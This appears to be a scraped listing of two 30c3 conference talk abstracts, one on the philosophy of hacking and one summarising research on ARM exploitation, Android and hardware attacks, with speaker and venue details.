Sat, 12/28/2013 + Lizenz: CC-by

[h=1]The philosophy of hacking [30c3][/h] The philosophy of hacking Contemplations on the essence of hacking and its implications on hacker ethics Modern society's use of technology as an instrument for domination is deeply problematic. Are instrumentality and domination inherent to the essence of technology? Can hacking provide an alternative approach to technology which can overcome this? How do art and beauty fit into this approach? In order to understand the essence of hacking, it is important to first critically examine the essence of (modern) technology and the rationalization of technological development. Because for all the wonderful things technology has given us, it has also brought us a vast array of instruments for domination, ranging from nuclear warheads to the panoptic surveillance state. As a community that is so deeply involved with technology, it is imperative for us to comprehend that these developments did not come out of thin air and that we have the choice to follow a different path. Understanding Heideggers notion of enframing as the product of historical rationalization gives us an insight in the relation between the objective, scientific approach to technology and its instrumentalization as a means for domination. Yet it also highlights the subversive potential of hacker cultures. The hackers' playful curiosity and desire to express creativity within the computer-imposed frameworks of formal logic has the potential to transcend code into poetry, reconnecting techne with poiesis and mapping the road towards the revealing nature of technology. Hacking has the potential to elevate abstract technological mechanisms and relations dissociated from the individuality to the plane of the utmost concrete and subjective images. As the creative output of the hacker both adheres to the formal methods of boolean logic and at the same time challenges them by devoiding them of their rational finalities, the positivist rationale of what we hold to be most objective can be turned into an expression of the subject. I will argue that this repositioning of the subject provides the basis for transforming the technological rationale into one that is aimed at liberation. Speaker: groente EventID: 5278 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Mon, 12/30/2013 + Lizenz: CC-by

[h=1]Hardware Attacks, Advanced ARM Exploitation, and Android Hacking[/h]CCCen Hardware Attacks, Advanced ARM Exploitation, and Android Hacking In this talk (which in part was delivered at Infiltrate 2013 and NoSuchCon 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course (sold out at Blackhat this year and last) on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built. Where relevant we will also discuss ARM exploitation as it related to Android as we wrote about in the "Android Hackers Handbook" which we co-authored and will be released in October 2013. Lastly, we will also discuss some of our most recent related hardware research (to facilitate the above) which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supportive tools used and techniques developed to perform this work and deploy them against Apple MFI iAP devices, and multimedia devices using OEM implemented USB stacks. (Which will briefly include our experiences around starting int3.cc - Tools for the Talented where we sell a fully assembled modified version of a hardware USB fuzzer.) Along the way we will inevitably share some of the lessons we also learned while completely designing the hardware (from scratch), writing the firmware, and mobile apps for an embedded security device called Osprey that we hold the patent for and have been publicly about publicly as a hardware vulnerability assessment swiss-army-knife for researchers. Speaker: Stephen A. Ridley EventID: 5193 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: 12/28/2013 + Lizenz: CC-by